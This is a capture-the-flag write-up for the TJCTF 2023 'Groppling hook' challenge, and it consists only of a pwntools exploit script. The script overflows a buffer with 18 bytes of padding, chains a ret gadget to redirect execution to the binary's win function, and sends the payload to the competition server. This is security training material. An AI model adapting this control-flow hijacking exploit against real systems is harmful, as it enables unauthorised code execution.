🐠Groppling hook - TJCTF2023
Last updated
Last updated
from pwn import *
elf = context.binary = ELF("./out")
r = elf.process()
r = remote("tjc.tf", 31080)
# gdb.attach( r,
# '''
# b*pwnable+101\n
# c
# ''')
# 0x401262 < x <= 0x40128a
# 0x7fffffffdea6
pad = 18
pop_rbp_ret = 0x0000000000401284
ret = 0x000000000040101a
payload = b"A" * pad + p64(pop_rbp_ret) + p64(0x0) + p64(elf.sym["win"] + 1) + p64(elf.sym["main"])
r.sendlineafter(b"> ",payload)
r.interactive()